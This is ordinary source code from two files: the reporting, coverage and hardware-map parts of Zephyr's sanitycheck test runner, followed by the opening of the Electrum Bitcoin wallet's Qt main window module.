el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
el.text = filtered_string
elif instance.results[k] == 'SKIP':
el = ET.SubElement(
eleTestcase,
'skipped',
type="skipped",
message="Skipped")
result = ET.tostring(eleTestsuites)
with open(os.path.join(outdir, platform + ".xml"), 'wb') as f:
f.write(result)
def xunit_report(self, filename, append=False):
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for instance in self.instances.values():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if instance.status in ["failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
else:
passes += 1
run = "Sanitycheck"
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
eleTestsuite = tree.findall('testsuite')[0]
else:
eleTestsuites = ET.Element('testsuites')
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (errors + passes + fails + skips),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
for instance in self.instances.values():
# remove testcases that are a re-run
if append:
for tc in eleTestsuite.findall('testcase'):
if tc.get('classname') == "%s:%s" % (
instance.platform.name, instance.testcase.name):
eleTestsuite.remove(tc)
handler_time = 0
if instance.status != "failed" and instance.handler:
handler_time = instance.metrics.get("handler_time", 0)
eleTestcase = ET.SubElement(
eleTestsuite,
'testcase',
classname="%s:%s" % (instance.platform.name, instance.testcase.name),
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
failure.text = filtered_string
f.close()
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Lcov()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
t.gcov_tool = tool
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform):
device = {
"serial": serial,
"platform": platform,
"counter": 0,
"available": True,
"connected": True
}
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self):
from serial.tools import list_ports
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = d.device
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=yaml.FullLoader)
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product']:
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum.gui import messages
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
